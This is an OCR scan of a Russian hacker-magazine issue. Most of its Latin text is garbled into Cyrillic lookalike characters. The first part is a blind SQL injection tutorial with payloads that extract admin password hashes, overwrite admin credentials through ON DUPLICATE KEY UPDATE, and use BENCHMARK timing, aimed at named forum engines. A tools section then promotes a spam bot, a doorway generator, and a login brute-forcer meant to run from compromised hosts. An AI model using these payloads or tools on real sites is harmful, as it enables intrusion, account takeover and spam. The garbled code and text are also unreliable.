форумах]. Это обстоятельство несколько облегчает нашу задачу. При помо- 
щи функции БОѴѴЕРО и известного набора символов мы сможем получить 
результат достаточно быстро. Какты знаешь, Мйб-хэш может состоять толь- 
ко из цифр от 1 до 1 0 и букв а, Ь, с, б, е, Б что значительно сужает диапазон 
вероятныхзначений при реализации перебора. 

Используя уже имеющиеся навыки общения с АЗС 1 1 (] и ЗУББТРІЫбО, соста- 
вим запрос с подзапросом — выборкой пароля из поля ра55\л/оп± Сначала 
убедимся, что поле не пустое: 

ЗЕЬЕСТ * РЕОМ 'изегз' ШЕЕЕ 'ій' = '1' апб 
АЗСІІ (ЗЦВЗТЕІЫ6 ( (зеІесБ раззѵгогб. Бгош изегз ѵЛіеге 
ій=1) Д Д) ) > 0 > 1 

ЗЕЬЕСТ * ЕЕОМ 'изегз' ШЕЕЕ 'ій' = '1' апб 
АЗСІІ (ЗБВЗТЕІШ ( (зеІесБ раззмогй бгот изегз ѵ7Ііеге 
ій=1) ДД) )<0 > О 
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При больших объемах перебора рационально применить метод сравнения 
с использованием конструкции ІЫ или ЫОТ ІЫ. 

ЗЕЬЕСТ * РВОМ 'изегз ' ШЕЕЕ у ісЗ.' = '1' апй 

АЗСІІ ( ЗІІВЗТЕІЫС ( (зеІесЕ раззиогсі Егот изегз ѵйіеге 

і<і=1) ,1,1) ) Ш(1,2,4,5) -- -> О 

ЗЕЬЕСТ * РВОМ 'изегз ' ШЕЕЕ Чй' = Ч' апй 

АЗСІІ (ЗігазТЕІШ( (зеІесЕ раззѵгогсі Егот изегз ѵйіеге 

Ш)ДД)) ІЫ ( 51 , 52 , 53 ) >1 

Выполнив этотзапрос, мы убеждаемся, что первый символ Мйб-пароля 
входит в цифровой диапазон 3-5 (не забывай, что аргументы ІЫ — это не 
значения, а их А5СІ 1-коды !). 

Однакоу этого метода по скорости выигрывает ВЕТѴѴЕЕЫ, так какой выпол- 
няется за меньшее количество тактов. 



ЗЕЬЕСТ * РЕОМ 'изегз' ШЕЕЕ 'ій'= '1' апсі 

азсіі (зиЬзЕгіпд ( (зеІесЕ раззѵуогсі Егот изегз ѵйіеге 

ІЙ=1) ,1.1)) ВЕТШЕЫ 1 апй 5-- -> О 

ЗЕЬЕСТ * РЕОМ 'изегз' ШЕЕЕ 'ій'= Ч' апсі 

азсіі (зиЪзЕгіпд ( (зеІесЕ раззѵгагсі Егот изегз ѵйіеге 

ій=1) ,1,1)) ВЕТШЕЫ 51 апсі 55 > 1 

Тебе решать, какой метод использовать. 

В конечном счете наша задача сводится к обнаружению некото- 
рого среза кодов, в который входит искомый символ, и последую- 
щему сравнению символа с каждым кодом в этом срезе. 

Далее подбирается второй символ, затем третий... 
пока не дойдем до последнего. Зато в итоге мы получим 
полноценный М05-хэш, без явного отображения данных 
на экране! 




Соге 2 Вио 

іпзіде' 



Сфокусируйтесь на бизнесе 

Компьютеры Одагііэ® серии Ю965 с технологией Іп8е® ѵРло™ 
поддерживают инновационные функции безопасности, 
производительности и удаленного управления, 
которые позволят Вам экономить время 
лри обслуживании инфраструктуры 
и уделять больше бремени развитию своего бизнесе. 



$ Тпівс 

ООО «Трэй та к Инф с системе* 

тел. {8452) 5241-01 






Ш5ЕКГНЫЕ ТРЮКИ 

Как я уже сказал, универсальность метода перебора заключается втом, что 
он работает независимо от вида оператора (5ЕІ_ЕСТ, ІІЧ5ЕНТ, ІІРОАТЕ, 00, 
0ЕІ_ЕТЕ или 5ЕТ). Чтобы не быть голословным, приведу пример с бажным 
ІІЧ5ЕНТ. Предположим, что вуязвимом скрипте, отвечающем за регистра- 
цию нового юзера форума (этаких сценариев в Сети, поверь мне, великое 
множество), имеется запрос вида: 

$сзиегу = ' ШЗЕКТ ШТО 'изегз' (ісі, изегпаше, раззѵгогсі) 
ѴАЫІЕЗ ( \ ' ' . $_СЕТ [ ' ісі' ] . ' V Л' ехашр1е\ ' , \ ' 7 . 
шсЗ-5 ( ' ехашріе ' ) . ' \ ' ) ; ' ; 

Наша задача, в первую очередь, определить истинность или ложность 
выполнения инжектированного запроса. Чтобы искусственно вызвать 
ошибку, попробуем использовать оператор ІР вкупе с левым подзапросом 
«5ЕІ_ЕСТ 1 ІІІЧІОІЧ 5ЕІ_ЕСТ 2». Для организации задуманного нужно лишь 
указать в качестве уязвимого параметра ісі злую строку вида «Т,’ехатр1е’,1 
=ІР(А5СІІ(1)=48,1,(5ЕІ_ЕСТ 1 I) N ІОЫ 5ЕІ_ЕСТ 2)))/*». Итутже получить ошиб- 
ку: «ЗиЬциегу геіигпз тоге Ібап 1 гоѵѵ». Впрочем, существует и благоприят- 
ный исход событий, если сравнивать единичку с ее истинным кодом 49: 

ШЗЕКТ ШТО 'изегз' ( ісі, изегпаше , раззѵгогсі) ѴАШЕЗ ('1 
' , 'ехашріе' , 1=ІЕ (АЗСІІ (1) =48 ,1 , (ЗЕЬЕСТ 1 ШІОЫ ЗЕЬЕСТ 
2)))/* -> О 

ШЗЕКТ ШТО 'изегз' ( ісі, изегпаше , раз зѵгогсі) ѴАШЕЗ ('1 
' , 'ехашріе' Д=ІЕ (АЗСІІ (1) =49 ,1, (ЗЕЬЕСТ 1 ШІОЫ ЗЕЬЕСТ 
2)))/* -> 1 

в оы оирисАТЕ кеу 

Фактуязвимости скрипта мы установили. Теперь следует аккуратно про- 
эксплуатировать движок, заменив логин и пароль администратора нашими 
значениями :). РІачиная с версии Му50І_4.1 , работаетзамечательная 
конструкция «ОЫ ОІІРЫСАТЕ КЕУ», которая при выполнении ІІЧЗЕРТ’а с 
указанием специальных параметров чудесным образом делает не ІІЧ5ЕРТ, а 
целый ІІРОАТЕ! Рассмотрим этот недокументированный прием на практике. 
Представим, что табличка изегз имеет следующую структуру: 

'паше' ѵагсЬ.аг(60) 2ТОТ ЖГЬЬ сіеіаиіі: ' ' , 

'раззѵгогсі' ѵагсЬаг(32) ЮТ ШЬЬ сіеіаиіі: ' ' , 

'ешаіі' ѵагсТіаг(бО) ЫОТ №ІЬЬ сіе Таи 11: ' ' , 

' доіпсІаЬе' іпЬ(ІО) ипзідпеа ЫОТ ШЬЬ сіеіаиіі: 'О', 

РКІМАКУ КЕУ ( ' паше ' ) 

) ЕШШЕ=МуІЗАМ БЕЕАЬЬТ СНАКЗЕТ=иЫ8 ; 

Процедура добавления нового юзера происходит примернотак: 

ІШЕКТ ШТО 'изегз' ( 'паше' , 'раз зѵгогсі' , 'ешаіі' , 

' фоіпйаСе' ) ѴАШЕЗ ( 'ипаегѵйіаЬег ' , ' ЬезЬепд' , 'де@ 
ша.ги' , '12.12.2007') 

При инжектировании указанного запроса нужно использовать конструк- 
цию «ОЫ ОІІРЫСАТЕ КЕУ ІІРОАТЕ поле=значение», в результате которого 
мы обновим значения нужных нам полей: 

ШЗЕКТ ШТО 'изегз' ( 'паше' , 'раз зѵгогсі' , 'ешаіі' , 
'ЗоіпйаЪе' ) ѴАШЕЗ ( 'ипсІегШаДег ' , ' ЬезЬепд' , 'де@ 
ша.ги' , '12.12.2007') ОЫ ШРЫСАТЕ КЕУ ЬРБАТЕ 'паше'= 

' дешадІаЬіп' , 'раззѵгогсі' = 'шаііа' -- ' , ' ЬезЬепд' , 'де@ 
ша.ги' , '12.12.2007') 

В итоге мы имеем администратора детадіабіп (а не ипбегѵѵаіег) с собс- 
твенным паролем. 

Но основная фишка этой конструкции состоит втом, что с ее помощью мож- 
но легко апдейтить другие таблицы. Скажем, при известной структуре БД 
и наличии достаточных прав мы можем легко изменить админский пароль 
соседнего движка, подвязанного ктой же базе :). Не веришь? Смотри сам: 



ШЗЕКТ ШТО 'изегз' ('паше', ' раз зѵгогсі ' , 'ешаіі' , 

' доіпсНабе' ) ѴАШЕЗ ( ' ипйегѵйіаЬкг ' , ' ЬезЬепд' , 'де@ 
ша.ги' , '12.12.2007') ОЫ ОІІРЫСАТЕ КЕУ ЬРБАТЕ ЬаЪ1е2 . 
асітіп_разз = 'ипсІегШАТ? ! ' 

□ ВЕЫСНМАКК 

Пришло время поговорить о загадочной функции ВЕІЧСНМАРК. Обычно 
хакеры используют ее для анализа запросов, когда не дает результатов 
даже варианте подзапросами. Метод с ВЕІЧСН МАРК впервые описал 1 сП. 
ѵѵОІТ (бывший ведущий Наск-Рад). В дальнейшем им были широко раскрыты 
возможности этого способа в его Мануэле по ЬепсЬтагк-инъекциям. Суть 
метода примернотакова: используя ІР в специальной конструкции, мы мо- 
жем заставить Му50І_ производить какие-то действия в случае правильного 
запроса и, замеряя время ответа от сервера, судить об истинности запроса. 
Время, которое при этом затрачивает Му50І_, — это время, израсходованное 
на клиента, а не потраченное центральным процессором. Поэтому рекомен- 
дуется выполнять ВЕІЧСНМАРК несколько раз, чтобы убедиться в правиль- 
ности заданного условия в зависимости от различной нагрузки процессора. 
ВЕІЧСНМАРК сильно загружает процессор, и поэтому выполнять его 
стоиттолько при верном запросе, так как количество удачных попыток 
перебора куда меньше, чем неудачных, да и время выполнения запроса 
оставляет желать лучшего (на работу эксплойта можетуйти больше 
часа). Также следует грамотно настроить параметр СОІІІЧТ функции 
ВЕІЧСНМАРК, так как для каждого сервера он будет разным. К примеру, 
проверка М 05-хэша адми некого пароля с явно указанным Іезі выглядит 
примерно так: 

ЗЕЬЕСТ 'разе' ЕКОМ 'изегз' ШЕКЕ 'Іодіп' = ' ' ог 1 = іі 
(азсіі ( 1 ) =49 , 1 , ЬепсЬшагк (999999 ,тс15 ( ' ЬезЬ ')))-- 

По времени отклика ты узнаешь, верный пароль или нет. 

0 РОК ЕХАМРБЕ 

Ура! Мы рассмотрели все методы на практике. Теперь перейдем к их 
программной реализации и сразу глянем на продуктЕтаШЧике. На мо- 
мент написания статьи последняя версия была 2.0.4. В файле тосіиіез/ 
тетЬегз/І05І:_ра55.рЬр можно легко нащупать ЫіпсІ БОЫщесбоп при 
высылке забытого пароля. 

$изегпаше = Ьгіт ( зЬгір_1:адз ($_РОЗТ[ 'изегпаше' ] ) ) ; 
$изег_ешаі1 = Ьгіт ( збгір_і:адз ($_РОЗТ[ у изег_ешаі1' ] ) ) ; 
іі (($изегпаше 1= "") АШ ($изег_ешаі1 =="")) { 
$ѵ7Ііеге_с1а1: = "изегпаше = ' $изегпаше ' " ; 

} еізеіі ( ( $изегпаше == "") АШ ($изег_ешаі1 !="")) { 
$ѵЛіеге_сІаЬ = "изег_ешаі1 = ' $изег_ешаі1 ' " ; 

} еізеіі (($изегпаше != "") АЛБ ($изег_ешаі1 !="")) { 
$ѵЛіеге_сІаЬ = "изегпаше = '$изегпаше' АШ изег_ешаі1 = 

' $изег_ешаі1 ' " ; 

} еізеіі (($изегпаше == "") АШ ($изег_ешаі1 =="")) { 
Ьеасіег ("ЬосаЬіоп: іпаех.рЪр?до=МетЪегз&іп=1оз1:_ 
разз " ) ; 
ехіь ; 

} 



$зд1 = "ЗЕЬЕСТ * ЕКОМ " . ЗЫ_МЕМВЕКЗ_ТАВЬЕ . " ШЕКЕ $Шеге_ 

аар " ; 

Нас вполне устроит подстановка инъекции в поле и5ег_етаіІ. Для этого 
немного поэкспериментируем с запросами. Подставляем значение «‘ АІЧО 
А5СІІ(1)=48/*» в поля етаіГа пользователя и видим редиректна страницу с 
ошибкой. 

При этом запрос, выполнившийся на сервере, примет следующий вид. 

ЗЕЬЕСТ * ЕКОМ 'изегз' ШЕКЕ изег_ешаі1 = ' ' АШ 
АЗСІІ (1) =48/* 
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ИзменимзначениеА5СІІ(1) на49 и при подстановке измененного запроса 
увидим сообщение об успешной отправке нового пароля на етаіі пользо- 
вателя. Однако настакой вариант не устраивает, поскольку это ни фига не 
по-хакерски :). Попробуем вытащить хэш администратора посимвольным 
перебором. Для этого вставим в качестве инъекции следующую конструкцию: 



123 ' ог АЗСІІ (31Ш5ТКШС( (зеІесЕ раззѵгогсі бгош зп_абшіпз 
ѵіЪ.е ге асЗшіп_ісі=1) ,1,1)) =49/* 



Та же ситуация имеет место с оператором ОЕІ_ЕТЕ. На примере известного 
проекта гипсгпз это выглядит следующим образом: при получении клиент- 
ского ІР-адреса проверяется лишьзаголовокХ-РОРѴѴАРОЕО-РОР, однако 
СиЕІМТ-ІРхоть и не проверяется, но учитывается. 

гипсшз/сіазз/соге .рЬр 130: ІГ (деЕепѵ ( "НТТР_ 

Х_ЕОВ.МАКВЕБ_Р(Ж " ) && зЕгсазестр (деЕепѵ ( "НТТР_Х_ 
ЕОВУ7АК.БЕБ_ЕОВ. " ) , " ипкпоѵт " ) ) 

гипсшз/сіазз/соге .рЬр 135: еізеіб (дебепѵ ( "НТТР_ 

СЫЕЫТ_ІР") && зЕгсазестр (декепѵ ( "НТТР_СЫЕЫТ_ІР" ) , 

" ипкпоѵтп " ) ) 

шо(1и1ез\пешЬЬ_р1из\с1азз\с1азз .ѵйіозопііпе .рЪр (32) : 
$зд1 = "БЕЬЕТЕ РВОМ " . $ЬЬТаЫе [ ' ѵ^ііозопііпе ' ] . " ѵіЪ.е ге 
ЕітезЕатр<>> . (Еіте ( ) -300 ОК изег_ір= ' " . _КЕМОТЕ_АББК . " ' " 



Взлом сервера через слепые 




Да, статеечка в тему. У 


инъекции требует долгой и 




меня как раз завалялся 


кропотливой работы. Но, 




файл с полсотней сайтов, 


как показала эта статья, 




которые я в свое время не 


всегда можно добиться 




доломал. Вечерком 


успеха ! 




займусь . 




Использование ЬОѴѴЕР сократит время перебора, но его стоит юзать только в 
случае, если регистр данных втаблице неимеетзначения. Обычнотаконо и есть, 
ведь пароли хранятся в М 05 и при переборе хэша регистр значения не имеет. 



Н НАРРѴЕЫР 



После некоторых манипуляций ядовитый запрос принимаетподобающий 
вид. Главное условие его успешного выполнения — существование втабли- 
це хотя бы одной сессии (иначе подзапрос не выполнится). 

123' ог 1=ІР (АЗСІІ (ЗБВЗТВШС ( (зеІесЕ разз Ггош изегз 
ѵіЪ.еге иісІ=1 ) , 1 , 1 ) ) =49 , 0 , ( зеІесЕ 1 ипіоп зеІесЕ 5) )/*"); 



Думаю, что описанные мной приемы помогуттебе в нелегком деле слепого 
50Е-инжектирования. Я уверен, что с первого раза утебя не получится 
повторить моитрюки, но многочасовыетренировки на локальном сервере с 
последующим анализом выполненных запросов научаттебя применять эти 
методы уже вслепую. По крайней мере, я на это надеюсь. Ведь в новом году 
все твои желания обязательно сбудутся! С праздником Іц-И 



РИ 




394030, і Шрош^ул %31аркса, 67, Шел (4732)512-412 
тштпѵт.т 



^Простое решение для (Вашего Бизнеса! 
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Программы для хакеров 0 



ПРОГРАММА: ЗРС 

ОС:У11Ч/*1Ч1Х 
АВТОР: МАСС 




Воттак сетевые паразиты спамят на блогах 



Какой только спам мы не рассматривали в жур- 
нале: и мыльный, и асечный, и даже агентовый. 
Воти сейчасзверьотнас неуйдет :]. Ты, скорее 
всего, не раз замечал рекламу в блогах, форумах, 
гостевых книгах и даже в чатах. Как работает 
подобного рода рассылка? На самом деле все 
достаточно просто: пишется контроллер, который 
заливается на хакерский сервер, а к нему вдогон- 
ку программится робот/спам-бот, отвечающий за 
обход отведенных ему адресов. Основная слож- 
ность такого спама заключается в том, что бот, как 
правило, бываетзаточен под движок конкретного 
форума/блога/чата/гесты. Поэтому универсаль- 
ный софт просто на вес золота. Одним из таких 
«самородков» является 500 — спамилка и 
генератор дорвеев. Если говорить более точно, то 
тулза умеет генерить контент дорвеев и спамить 
подавляющее большинство гостевух. Согласись, 
звучит весьма заманчиво. Так какдвигсофтины 
написан полностью на РНР, рассмотрим коротко 
процесс настройки и основные фичи: 



іпзЪаІІ . ркр — залить на сервер и 
запустить перед началом работы (соз- 
дает БД и таблицы, необходимые для 
работы ЗБС) . 

сопГід.рЬр — конфигурация оболочки, 
БД. 

\реаг — необходимые для работы биб- 
лиотеки РЕАК. 



Хзегѵдеп — функциональная часть 
движка . 

сопТ.рЪр — настройки дорвей-генера- 
тора и спам-робота. 



Параметры запуска (ручной или для планиров- 
щика сгоп): 



ТЩЬр : //ІосаІЬозб/боогдеп/зегѵдеп/ 
іпбех.р]ір?деп — запуск генератора. 
ТЩСр : //ІосаІЬозб/боогдеп/зегѵдеп/ 
зрш_збаг1: .рЬр — запуск спамера. 



Система обладаем удобным веб-интерфейсом 
и авторизацией (логин/пароль прописываются 
в сопбд.рЬр). После входа можно настроить 
генератор контента дорвеев, а также ручной 
режим спама. Проблем возникнуть не должно 
:). Единственное но: тулза требует наличия РНР 
четвертой версии и выше. Но все это мелочи 
по сравнению с возможностями этого мощного 
приватного инструмента. Пользуйся, и с Новым 
годом тебя :]. 

ПРОГРАММА: РНР ВІІС 5САШЕР 
ОС:Ѵ№ОѴ52О00/ХР 
АВТОР: КА20Р 

Давненько в Х-Тооіб не появлялись хорошие 
сканеры веб-приложений. Что ж, исправляю это 
досадное недоразумение :). Но прежде чем пе- 
рейти к рассмотрению непосредственно самой 
софтины, хочу напомнить тебе о РРѴ5. Если ты 
запамятовал, РРѴ5 — уникальный и легендар- 
ный продукт, направленный на анализ уязви- 
мостей в РНР-движках. Год назад я подробно 
рассказывал о его возможностях, да и сейчас 
ему следует отдать даньуважения. Но написан 
РРѴ5 был достаточно давно, а потому мораль- 
но устарел. Именно поэтому представляю 
твоему вниманию очередную незаменимую в 
повседневном боевом хак-наборе утилу — РНР 
Вид Зсаппег, которая является своего рода 
расширенным аналогом РРѴ5 и предназначена 
для поиска бажных РНР-приложений :). Работа 




Работа сканера РНР-багов 



проги основана на сканировании различных 
функций и переменных в сорцах РНР-скриптов, 
которые могут быть задействованы при прове- 
дении веб-атак. Тулза умеет очень многое, вот 
лишь краткий перечень возможностей сканера: 



• возможность сканирования множества 
файлов или одного скрипта; 

• система пресетов : можно вручную 
добавлять новые функции, изменять или 
удалять их; 

• возможность загрузки и сохранения 
своих пресетов ; 

• семь специальных пресетов , сгруппи- 
рованных по категориям: 

собе ехесиЬіоп 
соттапб ехесиСіоп 
бігесііогу Ьгаѵегзаі 
дІоЬаІз оѵегѵлгіСе 
іпсіибе 
3<2Ь-іпзесбіоп 
шізсеііапеоиз; 

• сохранение и загрузка результатов; 

• сортировка результатов по имени 
скрипта , номеру строки или функции , 
которая была найдена; 

• быстрый обзор скрипта с подсветкой 
кода и пронумерованными строками; 

• вычисление хэшей 2епб_Ь.азЪ._бе1_кеу_ 
ог_іпбех ; 

• Зіігіпд 2 скг ( ) сопѵегЬег — представ- 
ление строки в виде А8СІІ -символов в 
соответствии с синтаксисом РНР. 
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Крометого, софтина обладаетудобным гуиш- 
ным интерфейсом и опциями а ктивации/откл га- 
чен ия анализа тех или иных уязвимостей. Все 
это делает процесс сканирования РНР-движков 
почти полностью автоматизированным. Почему 
почти? Да потому, что необходимость в собс- 
твенных мозгах и прямых руках еще никто не 
отменял :). Атулза — она свою работу сделает, и 
сделаетхорошо, будь уверен :). 

ПРОГРАММА: РІЕІ.05 ВРІІТЕ 
ОС: ѴІИ/*МІХ 
АВТОР: ІЧОМЕК1 



Подбор аккаунтов 

Об универсальности и автоматизированности 
пишется постоянно и помногу. Так сложилось, 
что в этот раз тебе повезло — в нынешнем 
новогоднем выпуске Х-Тооіз тебя ждет еще 
один сюрприз под названием Ріеісіз ВгіЛе. 
Тулза является универсальным (подчеркиваю 
это сладостное слово :)) брутером веб-форм 
авторизации. Это означает, что она способна 
брутить аккаунты к большинству сайтов, где 
используется веб-авториз. Причем никаких 
лишнихтелодвижений оттебя нетребуется, 
достаточно выполнить следующие действия: 



1. Залить файлы из архива на хост с 
поддержкой сокетов (читай: ломаный 
шелл) . 

2. Выставить файлам ВАБ.ЦхС, СООБ. 

ЦхЦ права на запись (сЪтосі 777) . 

3. Залить в файлик раззисіз . Цхк сло- 
варь паролей для брута . 

4. Запустить іпсіех.рЬр, заполнить 
все поля и нажать ЗиЬшіб , после чего 
скрипт начнет брут, а мы сможем пойти 
попить пиво : ) . 



Скриптумеет работать с 6ЕТ- и РОБТ-запро- 
са ми, а при желании ты можешь дописать брут 
по логин-листу. Конечно, существует один 
внушительных размеров минус — однопоточ- 
ность скрипта, но его с лихвой компенсирует 
стабильная работа брутера. Ведь что главное 
для подобного софта? Правильно, надежность. 
Поэтому настоятельно рекомендую запускать 
Ріеісіз Вгиіе с серверов, админы которых нахо- 
дятся в запое все 365 дней в году :). 

ПРОГРАММА: СНЕСКЕК КЮЛІ-А.ІИРО 
ОС: ѴІГЧ/*ІЧІХ 
АВТОР: 0ЕМ01Ч0Ю 

Этом, что Сеть давно превратилась в место для 
взаимовыгодных расчетов, сегодня знают все. 



Оно и понятно, при соблюдении определен- 
ных мер безопасности (о которых, кстати, в ][ 
писалосьуже не раз) в онлайне можно нетолько 
продавать «специфические»товары, но и пре- 
доставлять не менее «специфические»услуги :). 
Рай, не правда ли? 

Воттолько и в этой бочке с медом есть ложка 
дегтя — кидалы. Не спорю, кидалы есть 
везде: и в реале, и в Сети — такустроен мир 
(если где-то убыло, значит где-то прибыло :)). 
Однако в Сети кинуть напарника/партнера при 
проведении сделки куда проще. Посуди сам, 
скорее всего, риппера и искать-то не будут, не 
говоря уже о привлечении к ответственности. 

В этом плане хоть как-то защищены приватные 
ресурсы, на которых функционирует система 
поручительства. А как быть, если заказчик/ 
клиент стучит к тебе в асю, представляясь 
малознакомым ником? Вот здесь-то тебе и 
помогут такие проекты, как ѵѵѵѵѵѵ.кісіаіа.іпіо 
и пара аналогичных ресурсов (Гугл в зубы :)). 
Огорчает одно: заходить каждый раз на тот же 
ѵѵѵѵ\л/.кісІа[а.іпіо порой обламывает, а искать 
там асю/ник ленятся даже самые настойчи- 
вые. Для облегчения парсинга базы кидал 




был написан Антириппер-Бот, который висит 
на уине 455506. Но и здесь присутствует одно 
жирное но: бот часто уходит в оффлайн :(. Ви- 
димо, именно это и побудило чела с загадоч- 
ным ником бетопоісі накатать простенький, 
но чрезвычайно полезный Регі-чекер для 
ѵѵѵѵѵѵ.кісіаІа.іпЬ . Скрипт состоит буквально из 
десятка строк кода и активно юзает І_ѴѴР. При 
старте чекера в консольке можно наблюдать 
параметры его запуска: 



С: \>г.р1 

кісіаіа . іпГо ~/ВІаск-1ізб ТНКЕМ іп 
бке іпбегпеб (Віаск Ьізб ) / 

изаде :С: \г .рі <иіп> 

ехашріе :С: \г.р1 332065167 



То есть, для того чтобы чекнуть по базе кидал 
человека с асей 332065167, следует вбить: 



С: \>г.р1 332065167 



В ответ скрипт выдасттебе следующую инфу: 



Ыіск: 


Зрагку 


Ыік ѵісЦігп: 


Махішиз 


Асісіесі: кССр: / /кісіаіа. іпГо/Гогиш/ 


зиі .Ькті 




АсМесЗ Ыіск: 


опопіт 


ІБ об гедиезк : 


33 



БаСе об асісііСіоп: 01.05.2006 

17:42 

СоіптепРз: 0 

Моге іпГогшаСіоп: 

ЪССр : / / 332065167 . кісіаіа . іпіо/ 



Как видишь, все данные предоставляются в 
удобочитаемом виде. Крометого, запускать 
скрипт можно как на никсовом шелле, так и в 
Винде, естественно, при наличии установлен- 
ного Регі’а. Так что мой тебе совет: юзай СЬескег 
кісІаІа.іпГо — дай отпор рипперам! :) 

ПРОГРАММА: РНР ЗРАМ СІІЕЗТ 
ОС: ѴІМ/*МІХ 




Гостевые книги - излюбленное место спаме- 
ров 

О спаме по гестам в этом выпуске Х-Тооіз я уже 
писал. Тем не менее спешу снова порадовать 
тебя :). Все дело втом, что один из моихзнако- 
мых не поленился скинуть мне замечательную 
спамилку гостевух под названием РНР Брат 
ѲиезГ Написана она на РНР и представляет со- 
бой пару скриптов: зрат.рЬр и зоЬг.рЬр. Кроме 
того, в каталоге располагается файлик іпсіех. 
Ьігпі, содержащий в себе менюшку спамилки 
и Ьазез.сіаі: — базу с линками на гесты. Перед 
началом постинга тебе предлагается заполнить 
следующие поля: 



1 . Уоиг Ыаше 

2 . Е-Маіі 

3. ШЬ 

4. Сібу 

5. ЗТаЪе: 

6 . СоипСгу 

7 . СотшепЦз 



Причем полятребуется заполнять четким, чита- 
бельным текстом (нечего от руки размазывать :)). 
Крометого, скриптспамит гостевые книги формата 
асІсІдиезГб^тІ и асІсІдиезГЬіт, следовательно, и в 
базе с линками Ьазез.сіаі лежат ссылки такого вида: 



\лллтѵ7. сЬіІсігепзЬоокзопІіпе . огд/ 
диезбЪоок/аскЗдиезЦ . ЬСшІ 
ѵа\м. сП . Ікіі. зе/~аГго/ ^еГГ/ 
диезбЪоок/айсЗдиезЦ . ЬСтІ 
ѵА\м.Ърс . огд/ѵтрс/диезбЪоок/ 
асНдиезк . Ькті 

ѵа\м . Ігіешап-Цаіша . сош/диезЦЬоок/ 
асПдиезЦ . кСтІ 



Несмотря на то что спамилка не является 
универсальной в своем роде, она вполне рабо- 
тоспособна. Так что теперь ничего не мешает 
хакеру залить скрипты на ломаный хости с 
легкой руки запустить постинг :).□□ 
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сцена 




II 



ы знаем, где ты 


НЕ 


'дешь тусить в новом год> 


ш 



Компьютерный мир бог/ат на события. Хай-тек-выставки, фестивали, демо-пати, игровые тур- 
ниры, хакерские посиделки. И ты, дитя информационного века, естественно, хочешь посетить 
эти мероприятия. Чтобы было легче сориентироваться и составить график, 
вот тебе календарь в помощь. Интересных встреч в новом году! 



Что: СеВІТ 2008 

эшашжі 



Где: Ганнове 



Когда : 4-9 марта 



Что: Ипихмогісі СопГегепсе апб Ехро 


Где: Сан-Франциско, США 


1 


ІКогда : 4-7 августа 






Сайт: иим . 1 і пихмогісіехі: 


зо . сот/ 1 і ѵе / 1 2 



Любители Слаки, красноглазные Сепіоо’шники, многочисленные 



убунтовцы и остальные активисты движения имени Линуса Торвальдса 
— эти мероприятия проводятся специально для них, чтобы они не умер- 
ли за компьютером, десятый раз за ночь пересобирая кегпеі. Сморщив 
нос и всем видом демонстрируя синдромы пищевого отравления, могут 
прийти ВЭО'шники для общения с «братьями меньшими». 
Калифонийский форум — самое, наверное, масштабное собрание 
фанатов тукса. 



ІСайт: мим . сеЬі і . сіеі 



Это настоящая Мекка для техноманьяков и просто неравнодушных к 
ІТ людей. Самое крупное мероприятие. СеВІТ образовался в начале 
шестидесятых годов в чудном городе Ганновер как часть торговой 
выставки. В 1 986-м он набрал такую популярность, что стал проводиться 
как самостоятельное мероприятие. 

В начале века за СеВІТ окончательно закрепляется статус самой массо- 
вой выставки технологий. Сюда с конкретной целью вложения денег в 
проекты приезжаюттоп-менеджеры. Сюда едут разработчики, которым 
эти деньги ох как нужны. Компании разбиты по секторам в зависимости 
от направления их деятельности. Километры техники. Чтобы выделить- 
ся среди конкурентов, компании выставляют свои самые экзотические и 
шокирующие своим дизайном продукты. 
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Что: Наск I п ТЬе Вох (НІТВ) 2008 



Где: Дубай, ОАЭ 



Когда: 14-17 апреля 



Сайт: ѵѵѵѵѵѵ.ЬаскіпібеЬох.ог 



Если хочется совместить приятное с полезным, НІТВ — это именно то, 
что нужно. Когда ж еще ты сможешь искупаться в водах Персидского 
залива, а потом отдохнуть от палящего солнца, слушая выступления 
по-настоящему известных специалистов в области ІТ-безопаснос- 
ти? Дхиллон Эндрю, организатор конференции, задумывал НІТВ как 
элитарное мероприятие для узкого круга лиц, не понаслышке знакомых 
с хакерской тематикой. Таковым оно является и сейчас — к выступле- 
ниям допускаются исключительно профи с именем! Вдвойне приятно, 
что наряду с прослушиванием выступлений можно принять участие 
в ежегодном конкурсе по взлому Саріиге ТЬе Ріад «І_іѵе Наскіпд» 
СотреЛЛо, получив в качестве приза вполне реальные тысячи долла- 
ров. В прошлом году, кстати, это никому не удалось! 



Что : 


ОгеатНаск 


Г де : 


Иенчепинг, Швеция| 


Когда: 20-е числа июняі 


|Сайт 


: ммм . бгеатбаск . зе| 






Когда: последние числа августа 



Сайт: сс.ог§.ги 



Старейшее демо-пати России. Все хай-тек-маньяки Питера и Москвы. 
Тут можно посмотреть на раздолбанные Амиги, пересобранныеъпектру- 
мы, самопальные Арріе II. Пощелкать калькулятор «Микроша». Гюсмот- 
рет э документальные видеофильмы о компьютерных корпорациями рек- 
лам ные ролики АМБ конца восьмидесятых. Нарисовать голого Гейтса, 
уча :твуя в геаІ-Лте бгаЛкз. Полюбоваться на то, какие спецэффекта 
делают кодеры-художники в своих демках. Вооружившись подшивкой 
жур налов «Хакер», не спать двое суток, ломая НаскОиезЛ Или просто 
напиться возле входа с компьютерщиками и завалиться спать в зале, 
закрываясь от мерцания І_СБ-мониторов. Непередаваемая атмосфера 
ІТ-Іединства. Также оргкомитет в начале декабря проводит НаскАгоипсІ. 
То же самое ЦЦ, только узкоспециализированное, тут никакого рисова- 
ния, одна сплошная безопасность. Девушкам вход бесплатный, причем 
они (девушки) есть, и даже красивые. 



Что: НОРЕ (Наскегз Оп Ріапеі ЕагГН) 



Где: Нью-Йорк, США 



Когда : 18-21 июля 



Сайт: ммм. борепитЬегзіх . пеі 



Мероприятие организуетлегендарный журнал 2600 ТЬе Наскег Оиагіегіу. 
Название переводится как«Хакеры на планете Земля», а большинство 
участников — люди идейные. Каждый из них по-своему смотрит на совре- 
менное образование, бешеный рост ведущих мировых корпораций, числа 
коммерческих хакеров, авторское право и т.д. 



Это не какая-то там выставка, это настоящий компьютерный фестиваль. 
Самая крупная І_АІ\]-вечеринка на планете. В 2004 году число посетите- 
лей, зафиксированное в Книге рекордов Гиннесса, составило 5272. Вход 
— только со своими компьютерами. Тусовка преимущественно геймерс- 
кая. Хакеры, конечно, там тоже есть, но киберспортсменов существенно 
больше. Пати занимает площадь, равную примерно десяти квадратным 
километрам. Соответственно, если ты посетишь это мероприятие, у тебя 
как минимум будет 20 метров личного пространства! На БгеатНаск 
проводятся турниры по программированию, а также по самым разным 
компьютерным играм. 

Билеты нужно заказываться заранее — ко дню открытия их, как правило, 
уже не бывает. 



Что: ІпГозе сигі ГУ М05СОИ 



Где: Москва 



Когда: конец сентября 



Сайт: мим . т птозеси п Гутовсон . сот 



